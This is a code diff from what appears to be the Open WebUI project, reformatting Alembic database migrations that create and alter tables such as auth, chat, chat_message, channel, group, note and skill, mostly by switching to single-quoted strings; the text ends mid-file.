backend/open_webui/migrations/versions/7826ab40b532_update_file_table.py+5 −5 modified@@ -9,18 +9,18 @@ from alembic import op import sqlalchemy as sa -revision = "7826ab40b532" -down_revision = "57c599a3cb57" +revision = '7826ab40b532' +down_revision = '57c599a3cb57' branch_labels = None depends_on = None def upgrade(): op.add_column( - "file", - sa.Column("access_control", sa.JSON(), nullable=True), + 'file', + sa.Column('access_control', sa.JSON(), nullable=True), ) def downgrade(): - op.drop_column("file", "access_control") + op.drop_column('file', 'access_control')
backend/open_webui/migrations/versions/7e5b5dc7342b_init.py+136 −136 modified@@ -16,7 +16,7 @@ from open_webui.migrations.util import get_existing_tables # revision identifiers, used by Alembic. -revision: str = "7e5b5dc7342b" +revision: str = '7e5b5dc7342b' down_revision: Union[str, None] = None branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -26,179 +26,179 @@ def upgrade() -> None: existing_tables = set(get_existing_tables()) # ### commands auto generated by Alembic - please adjust! ### - if "auth" not in existing_tables: + if 'auth' not in existing_tables: op.create_table( - "auth", - sa.Column("id", sa.String(), nullable=False), - sa.Column("email", sa.String(), nullable=True), - sa.Column("password", sa.Text(), nullable=True), - sa.Column("active", sa.Boolean(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'auth', + sa.Column('id', sa.String(), nullable=False), + sa.Column('email', sa.String(), nullable=True), + sa.Column('password', sa.Text(), nullable=True), + sa.Column('active', sa.Boolean(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "chat" not in existing_tables: + if 'chat' not in existing_tables: op.create_table( - "chat", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("chat", sa.Text(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("share_id", sa.Text(), nullable=True), - sa.Column("archived", sa.Boolean(), nullable=True), - sa.PrimaryKeyConstraint("id"), - sa.UniqueConstraint("share_id"), + 'chat', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('chat', sa.Text(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('share_id', sa.Text(), nullable=True), + sa.Column('archived', sa.Boolean(), nullable=True), + sa.PrimaryKeyConstraint('id'), + sa.UniqueConstraint('share_id'), ) - if "chatidtag" not in existing_tables: + if 'chatidtag' not in existing_tables: op.create_table( - "chatidtag", - sa.Column("id", sa.String(), nullable=False), - sa.Column("tag_name", sa.String(), nullable=True), - sa.Column("chat_id", sa.String(), nullable=True), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("timestamp", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'chatidtag', + sa.Column('id', sa.String(), nullable=False), + sa.Column('tag_name', sa.String(), nullable=True), + sa.Column('chat_id', sa.String(), nullable=True), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('timestamp', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "document" not in existing_tables: + if 'document' not in existing_tables: op.create_table( - "document", - sa.Column("collection_name", sa.String(), nullable=False), - sa.Column("name", sa.String(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("filename", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("timestamp", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("collection_name"), - sa.UniqueConstraint("name"), + 'document', + sa.Column('collection_name', sa.String(), nullable=False), + sa.Column('name', sa.String(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('filename', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('timestamp', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('collection_name'), + sa.UniqueConstraint('name'), ) - if "file" not in existing_tables: + if 'file' not in existing_tables: op.create_table( - "file", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("filename", sa.Text(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'file', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('filename', sa.Text(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "function" not in existing_tables: + if 'function' not in existing_tables: op.create_table( - "function", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("type", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("valves", JSONField(), nullable=True), - sa.Column("is_active", sa.Boolean(), nullable=True), - sa.Column("is_global", sa.Boolean(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'function', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('type', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('valves', JSONField(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('is_global', sa.Boolean(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "memory" not in existing_tables: + if 'memory' not in existing_tables: op.create_table( - "memory", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'memory', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "model" not in existing_tables: + if 'model' not in existing_tables: op.create_table( - "model", - sa.Column("id", sa.Text(), nullable=False), - sa.Column("user_id", sa.Text(), nullable=True), - sa.Column("base_model_id", sa.Text(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("params", JSONField(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'model', + sa.Column('id', sa.Text(), nullable=False), + sa.Column('user_id', sa.Text(), nullable=True), + sa.Column('base_model_id', sa.Text(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('params', JSONField(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "prompt" not in existing_tables: + if 'prompt' not in existing_tables: op.create_table( - "prompt", - sa.Column("command", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("timestamp", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("command"), + 'prompt', + sa.Column('command', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('timestamp', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('command'), ) - if "tag" not in existing_tables: + if 'tag' not in existing_tables: op.create_table( - "tag", - sa.Column("id", sa.String(), nullable=False), - sa.Column("name", sa.String(), nullable=True), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("data", sa.Text(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'tag', + sa.Column('id', sa.String(), nullable=False), + sa.Column('name', sa.String(), nullable=True), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('data', sa.Text(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "tool" not in existing_tables: + if 'tool' not in existing_tables: op.create_table( - "tool", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("specs", JSONField(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("valves", JSONField(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'tool', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('specs', JSONField(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('valves', JSONField(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "user" not in existing_tables: + if 'user' not in existing_tables: op.create_table( - "user", - sa.Column("id", sa.String(), nullable=False), - sa.Column("name", sa.String(), nullable=True), - sa.Column("email", sa.String(), nullable=True), - sa.Column("role", sa.String(), nullable=True), - sa.Column("profile_image_url", sa.Text(), nullable=True), - sa.Column("last_active_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("api_key", sa.String(), nullable=True), - sa.Column("settings", JSONField(), nullable=True), - sa.Column("info", JSONField(), nullable=True), - sa.Column("oauth_sub", sa.Text(), nullable=True), - sa.PrimaryKeyConstraint("id"), - sa.UniqueConstraint("api_key"), - sa.UniqueConstraint("oauth_sub"), + 'user', + sa.Column('id', sa.String(), nullable=False), + sa.Column('name', sa.String(), nullable=True), + sa.Column('email', sa.String(), nullable=True), + sa.Column('role', sa.String(), nullable=True), + sa.Column('profile_image_url', sa.Text(), nullable=True), + sa.Column('last_active_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('api_key', sa.String(), nullable=True), + sa.Column('settings', JSONField(), nullable=True), + sa.Column('info', JSONField(), nullable=True), + sa.Column('oauth_sub', sa.Text(), nullable=True), + sa.PrimaryKeyConstraint('id'), + sa.UniqueConstraint('api_key'), + sa.UniqueConstraint('oauth_sub'), ) # ### end Alembic commands ### def downgrade() -> None: # ### commands auto generated by Alembic - please adjust! ### - op.drop_table("user") - op.drop_table("tool") - op.drop_table("tag") - op.drop_table("prompt") - op.drop_table("model") - op.drop_table("memory") - op.drop_table("function") - op.drop_table("file") - op.drop_table("document") - op.drop_table("chatidtag") - op.drop_table("chat") - op.drop_table("auth") + op.drop_table('user') + op.drop_table('tool') + op.drop_table('tag') + op.drop_table('prompt') + op.drop_table('model') + op.drop_table('memory') + op.drop_table('function') + op.drop_table('file') + op.drop_table('document') + op.drop_table('chatidtag') + op.drop_table('chat') + op.drop_table('auth') # ### end Alembic commands ###
backend/open_webui/migrations/versions/81cc2ce44d79_update_channel_file_and_knowledge_table.py+11 −13 modified@@ -13,36 +13,34 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "81cc2ce44d79" -down_revision: Union[str, None] = "6283dc0e4d8d" +revision: str = '81cc2ce44d79' +down_revision: Union[str, None] = '6283dc0e4d8d' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Add message_id column to channel_file table - with op.batch_alter_table("channel_file", schema=None) as batch_op: + with op.batch_alter_table('channel_file', schema=None) as batch_op: batch_op.add_column( sa.Column( - "message_id", + 'message_id', sa.Text(), - sa.ForeignKey( - "message.id", ondelete="CASCADE", name="fk_channel_file_message_id" - ), + sa.ForeignKey('message.id', ondelete='CASCADE', name='fk_channel_file_message_id'), nullable=True, ) ) # Add data column to knowledge table - with op.batch_alter_table("knowledge", schema=None) as batch_op: - batch_op.add_column(sa.Column("data", sa.JSON(), nullable=True)) + with op.batch_alter_table('knowledge', schema=None) as batch_op: + batch_op.add_column(sa.Column('data', sa.JSON(), nullable=True)) def downgrade() -> None: # Remove message_id column from channel_file table - with op.batch_alter_table("channel_file", schema=None) as batch_op: - batch_op.drop_column("message_id") + with op.batch_alter_table('channel_file', schema=None) as batch_op: + batch_op.drop_column('message_id') # Remove data column from knowledge table - with op.batch_alter_table("knowledge", schema=None) as batch_op: - batch_op.drop_column("data") + with op.batch_alter_table('knowledge', schema=None) as batch_op: + batch_op.drop_column('data')
backend/open_webui/migrations/versions/8452d01d26d7_add_chat_message_table.py+76 −88 modified@@ -16,8 +16,8 @@ log = logging.getLogger(__name__) -revision: str = "8452d01d26d7" -down_revision: Union[str, None] = "374d2f66af06" +revision: str = '8452d01d26d7' +down_revision: Union[str, None] = '374d2f66af06' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -51,82 +51,76 @@ def _flush_batch(conn, table, batch): except Exception as e: sp.rollback() failed += 1 - log.warning(f"Failed to insert message {msg['id']}: {e}") + log.warning(f'Failed to insert message {msg["id"]}: {e}') return inserted, failed def upgrade() -> None: # Step 1: Create table op.create_table( - "chat_message", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("chat_id", sa.Text(), nullable=False, index=True), - sa.Column("user_id", sa.Text(), index=True), - sa.Column("role", sa.Text(), nullable=False), - sa.Column("parent_id", sa.Text(), nullable=True), - sa.Column("content", sa.JSON(), nullable=True), - sa.Column("output", sa.JSON(), nullable=True), - sa.Column("model_id", sa.Text(), nullable=True, index=True), - sa.Column("files", sa.JSON(), nullable=True), - sa.Column("sources", sa.JSON(), nullable=True), - sa.Column("embeds", sa.JSON(), nullable=True), - sa.Column("done", sa.Boolean(), default=True), - sa.Column("status_history", sa.JSON(), nullable=True), - sa.Column("error", sa.JSON(), nullable=True), - sa.Column("usage", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), index=True), - sa.Column("updated_at", sa.BigInteger()), - sa.ForeignKeyConstraint(["chat_id"], ["chat.id"], ondelete="CASCADE"), + 'chat_message', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('chat_id', sa.Text(), nullable=False, index=True), + sa.Column('user_id', sa.Text(), index=True), + sa.Column('role', sa.Text(), nullable=False), + sa.Column('parent_id', sa.Text(), nullable=True), + sa.Column('content', sa.JSON(), nullable=True), + sa.Column('output', sa.JSON(), nullable=True), + sa.Column('model_id', sa.Text(), nullable=True, index=True), + sa.Column('files', sa.JSON(), nullable=True), + sa.Column('sources', sa.JSON(), nullable=True), + sa.Column('embeds', sa.JSON(), nullable=True), + sa.Column('done', sa.Boolean(), default=True), + sa.Column('status_history', sa.JSON(), nullable=True), + sa.Column('error', sa.JSON(), nullable=True), + sa.Column('usage', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), index=True), + sa.Column('updated_at', sa.BigInteger()), + sa.ForeignKeyConstraint(['chat_id'], ['chat.id'], ondelete='CASCADE'), ) # Create composite indexes - op.create_index( - "chat_message_chat_parent_idx", "chat_message", ["chat_id", "parent_id"] - ) - op.create_index( - "chat_message_model_created_idx", "chat_message", ["model_id", "created_at"] - ) - op.create_index( - "chat_message_user_created_idx", "chat_message", ["user_id", "created_at"] - ) + op.create_index('chat_message_chat_parent_idx', 'chat_message', ['chat_id', 'parent_id']) + op.create_index('chat_message_model_created_idx', 'chat_message', ['model_id', 'created_at']) + op.create_index('chat_message_user_created_idx', 'chat_message', ['user_id', 'created_at']) # Step 2: Backfill from existing chats conn = op.get_bind() chat_table = sa.table( - "chat", - sa.column("id", sa.Text()), - sa.column("user_id", sa.Text()), - sa.column("chat", sa.JSON()), + 'chat', + sa.column('id', sa.Text()), + sa.column('user_id', sa.Text()), + sa.column('chat', sa.JSON()), ) chat_message_table = sa.table( - "chat_message", - sa.column("id", sa.Text()), - sa.column("chat_id", sa.Text()), - sa.column("user_id", sa.Text()), - sa.column("role", sa.Text()), - sa.column("parent_id", sa.Text()), - sa.column("content", sa.JSON()), - sa.column("output", sa.JSON()), - sa.column("model_id", sa.Text()), - sa.column("files", sa.JSON()), - sa.column("sources", sa.JSON()), - sa.column("embeds", sa.JSON()), - sa.column("done", sa.Boolean()), - sa.column("status_history", sa.JSON()), - sa.column("error", sa.JSON()), - sa.column("usage", sa.JSON()), - sa.column("created_at", sa.BigInteger()), - sa.column("updated_at", sa.BigInteger()), + 'chat_message', + sa.column('id', sa.Text()), + sa.column('chat_id', sa.Text()), + sa.column('user_id', sa.Text()), + sa.column('role', sa.Text()), + sa.column('parent_id', sa.Text()), + sa.column('content', sa.JSON()), + sa.column('output', sa.JSON()), + sa.column('model_id', sa.Text()), + sa.column('files', sa.JSON()), + sa.column('sources', sa.JSON()), + sa.column('embeds', sa.JSON()), + sa.column('done', sa.Boolean()), + sa.column('status_history', sa.JSON()), + sa.column('error', sa.JSON()), + sa.column('usage', sa.JSON()), + sa.column('created_at', sa.BigInteger()), + sa.column('updated_at', sa.BigInteger()), ) # Stream rows instead of loading all into memory: # - yield_per: fetches rows in chunks via cursor.fetchmany() (all backends) # - stream_results: enables server-side cursors on PostgreSQL (no-op on SQLite) result = conn.execute( sa.select(chat_table.c.id, chat_table.c.user_id, chat_table.c.chat) - .where(~chat_table.c.user_id.like("shared-%")) + .where(~chat_table.c.user_id.like('shared-%')) .execution_options(yield_per=1000, stream_results=True) ) @@ -150,23 +144,23 @@ def upgrade() -> None: except Exception: continue - history = chat_data.get("history", {}) + history = chat_data.get('history', {}) if not isinstance(history, dict): continue - messages = history.get("messages", {}) + messages = history.get('messages', {}) if not isinstance(messages, dict): continue for message_id, message in messages.items(): if not isinstance(message, dict): continue - role = message.get("role") + role = message.get('role') if not role: continue - timestamp = message.get("timestamp", now) + timestamp = message.get('timestamp', now) try: timestamp = int(float(timestamp)) @@ -182,37 +176,33 @@ def upgrade() -> None: messages_batch.append( { - "id": f"{chat_id}-{message_id}", - "chat_id": chat_id, - "user_id": user_id, - "role": role, - "parent_id": message.get("parentId"), - "content": message.get("content"), - "output": message.get("output"), - "model_id": message.get("model"), - "files": message.get("files"), - "sources": message.get("sources"), - "embeds": message.get("embeds"), - "done": message.get("done", True), - "status_history": message.get("statusHistory"), - "error": message.get("error"), - "usage": message.get("usage"), - "created_at": timestamp, - "updated_at": timestamp, + 'id': f'{chat_id}-{message_id}', + 'chat_id': chat_id, + 'user_id': user_id, + 'role': role, + 'parent_id': message.get('parentId'), + 'content': message.get('content'), + 'output': message.get('output'), + 'model_id': message.get('model'), + 'files': message.get('files'), + 'sources': message.get('sources'), + 'embeds': message.get('embeds'), + 'done': message.get('done', True), + 'status_history': message.get('statusHistory'), + 'error': message.get('error'), + 'usage': message.get('usage'), + 'created_at': timestamp, + 'updated_at': timestamp, } ) # Flush batch when full if len(messages_batch) >= BATCH_SIZE: - inserted, failed = _flush_batch( - conn, chat_message_table, messages_batch - ) + inserted, failed = _flush_batch(conn, chat_message_table, messages_batch) total_inserted += inserted total_failed += failed if total_inserted % 50000 < BATCH_SIZE: - log.info( - f"Migration progress: {total_inserted} messages inserted..." - ) + log.info(f'Migration progress: {total_inserted} messages inserted...') messages_batch.clear() # Flush remaining messages @@ -221,13 +211,11 @@ def upgrade() -> None: total_inserted += inserted total_failed += failed - log.info( - f"Backfilled {total_inserted} messages into chat_message table ({total_failed} failed)" - ) + log.info(f'Backfilled {total_inserted} messages into chat_message table ({total_failed} failed)') def downgrade() -> None: - op.drop_index("chat_message_user_created_idx", table_name="chat_message") - op.drop_index("chat_message_model_created_idx", table_name="chat_message") - op.drop_index("chat_message_chat_parent_idx", table_name="chat_message") - op.drop_table("chat_message") + op.drop_index('chat_message_user_created_idx', table_name='chat_message') + op.drop_index('chat_message_model_created_idx', table_name='chat_message') + op.drop_index('chat_message_chat_parent_idx', table_name='chat_message') + op.drop_table('chat_message')
backend/open_webui/migrations/versions/90ef40d4714e_update_channel_and_channel_members_table.py+32 −34 modified@@ -13,68 +13,66 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "90ef40d4714e" -down_revision: Union[str, None] = "b10670c03dd5" +revision: str = '90ef40d4714e' +down_revision: Union[str, None] = 'b10670c03dd5' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Update 'channel' table - op.add_column("channel", sa.Column("is_private", sa.Boolean(), nullable=True)) + op.add_column('channel', sa.Column('is_private', sa.Boolean(), nullable=True)) - op.add_column("channel", sa.Column("archived_at", sa.BigInteger(), nullable=True)) - op.add_column("channel", sa.Column("archived_by", sa.Text(), nullable=True)) + op.add_column('channel', sa.Column('archived_at', sa.BigInteger(), nullable=True)) + op.add_column('channel', sa.Column('archived_by', sa.Text(), nullable=True)) - op.add_column("channel", sa.Column("deleted_at", sa.BigInteger(), nullable=True)) - op.add_column("channel", sa.Column("deleted_by", sa.Text(), nullable=True)) + op.add_column('channel', sa.Column('deleted_at', sa.BigInteger(), nullable=True)) + op.add_column('channel', sa.Column('deleted_by', sa.Text(), nullable=True)) - op.add_column("channel", sa.Column("updated_by", sa.Text(), nullable=True)) + op.add_column('channel', sa.Column('updated_by', sa.Text(), nullable=True)) # Update 'channel_member' table - op.add_column("channel_member", sa.Column("role", sa.Text(), nullable=True)) - op.add_column("channel_member", sa.Column("invited_by", sa.Text(), nullable=True)) - op.add_column( - "channel_member", sa.Column("invited_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('role', sa.Text(), nullable=True)) + op.add_column('channel_member', sa.Column('invited_by', sa.Text(), nullable=True)) + op.add_column('channel_member', sa.Column('invited_at', sa.BigInteger(), nullable=True)) # Create 'channel_webhook' table op.create_table( - "channel_webhook", - sa.Column("id", sa.Text(), primary_key=True, unique=True, nullable=False), - sa.Column("user_id", sa.Text(), nullable=False), + 'channel_webhook', + sa.Column('id', sa.Text(), primary_key=True, unique=True, nullable=False), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "channel_id", + 'channel_id', sa.Text(), - sa.ForeignKey("channel.id", ondelete="CASCADE"), + sa.ForeignKey('channel.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("profile_image_url", sa.Text(), nullable=True), - sa.Column("token", sa.Text(), nullable=False), - sa.Column("last_used_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('profile_image_url', sa.Text(), nullable=True), + sa.Column('token', sa.Text(), nullable=False), + sa.Column('last_used_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) pass def downgrade() -> None: # Downgrade 'channel' table - op.drop_column("channel", "is_private") - op.drop_column("channel", "archived_at") - op.drop_column("channel", "archived_by") - op.drop_column("channel", "deleted_at") - op.drop_column("channel", "deleted_by") - op.drop_column("channel", "updated_by") + op.drop_column('channel', 'is_private') + op.drop_column('channel', 'archived_at') + op.drop_column('channel', 'archived_by') + op.drop_column('channel', 'deleted_at') + op.drop_column('channel', 'deleted_by') + op.drop_column('channel', 'updated_by') # Downgrade 'channel_member' table - op.drop_column("channel_member", "role") - op.drop_column("channel_member", "invited_by") - op.drop_column("channel_member", "invited_at") + op.drop_column('channel_member', 'role') + op.drop_column('channel_member', 'invited_by') + op.drop_column('channel_member', 'invited_at') # Drop 'channel_webhook' table - op.drop_table("channel_webhook") + op.drop_table('channel_webhook') pass
backend/open_webui/migrations/versions/922e7a387820_add_group_table.py+29 −29 modified@@ -9,38 +9,38 @@ from alembic import op import sqlalchemy as sa -revision = "922e7a387820" -down_revision = "4ace53fd72c8" +revision = '922e7a387820' +down_revision = '4ace53fd72c8' branch_labels = None depends_on = None def upgrade(): op.create_table( - "group", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("permissions", sa.JSON(), nullable=True), - sa.Column("user_ids", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'group', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('permissions', sa.JSON(), nullable=True), + sa.Column('user_ids', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) # Add 'access_control' column to 'model' table op.add_column( - "model", - sa.Column("access_control", sa.JSON(), nullable=True), + 'model', + sa.Column('access_control', sa.JSON(), nullable=True), ) # Add 'is_active' column to 'model' table op.add_column( - "model", + 'model', sa.Column( - "is_active", + 'is_active', sa.Boolean(), nullable=False, server_default=sa.sql.expression.true(), @@ -49,37 +49,37 @@ def upgrade(): # Add 'access_control' column to 'knowledge' table op.add_column( - "knowledge", - sa.Column("access_control", sa.JSON(), nullable=True), + 'knowledge', + sa.Column('access_control', sa.JSON(), nullable=True), ) # Add 'access_control' column to 'prompt' table op.add_column( - "prompt", - sa.Column("access_control", sa.JSON(), nullable=True), + 'prompt', + sa.Column('access_control', sa.JSON(), nullable=True), ) # Add 'access_control' column to 'tools' table op.add_column( - "tool", - sa.Column("access_control", sa.JSON(), nullable=True), + 'tool', + sa.Column('access_control', sa.JSON(), nullable=True), ) def downgrade(): - op.drop_table("group") + op.drop_table('group') # Drop 'access_control' column from 'model' table - op.drop_column("model", "access_control") + op.drop_column('model', 'access_control') # Drop 'is_active' column from 'model' table - op.drop_column("model", "is_active") + op.drop_column('model', 'is_active') # Drop 'access_control' column from 'knowledge' table - op.drop_column("knowledge", "access_control") + op.drop_column('knowledge', 'access_control') # Drop 'access_control' column from 'prompt' table - op.drop_column("prompt", "access_control") + op.drop_column('prompt', 'access_control') # Drop 'access_control' column from 'tools' table - op.drop_column("tool", "access_control") + op.drop_column('tool', 'access_control')
backend/open_webui/migrations/versions/9f0c9cd09105_add_note_table.py+12 −12 modified@@ -9,25 +9,25 @@ from alembic import op import sqlalchemy as sa -revision = "9f0c9cd09105" -down_revision = "3781e22d8b01" +revision = '9f0c9cd09105' +down_revision = '3781e22d8b01' branch_labels = None depends_on = None def upgrade(): op.create_table( - "note", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("access_control", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'note', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('access_control', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) def downgrade(): - op.drop_table("note") + op.drop_table('note')
backend/open_webui/migrations/versions/a1b2c3d4e5f6_add_skill_table.py+18 −18 modified@@ -13,33 +13,33 @@ from open_webui.migrations.util import get_existing_tables -revision: str = "a1b2c3d4e5f6" -down_revision: Union[str, None] = "f1e2d3c4b5a6" +revision: str = 'a1b2c3d4e5f6' +down_revision: Union[str, None] = 'f1e2d3c4b5a6' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: existing_tables = set(get_existing_tables()) - if "skill" not in existing_tables: + if 'skill' not in existing_tables: op.create_table( - "skill", - sa.Column("id", sa.String(), nullable=False, primary_key=True), - sa.Column("user_id", sa.String(), nullable=False), - sa.Column("name", sa.Text(), nullable=False, unique=True), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=False), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("is_active", sa.Boolean(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), - sa.Column("created_at", sa.BigInteger(), nullable=False), + 'skill', + sa.Column('id', sa.String(), nullable=False, primary_key=True), + sa.Column('user_id', sa.String(), nullable=False), + sa.Column('name', sa.Text(), nullable=False, unique=True), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=False), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('is_active', sa.Boolean(), 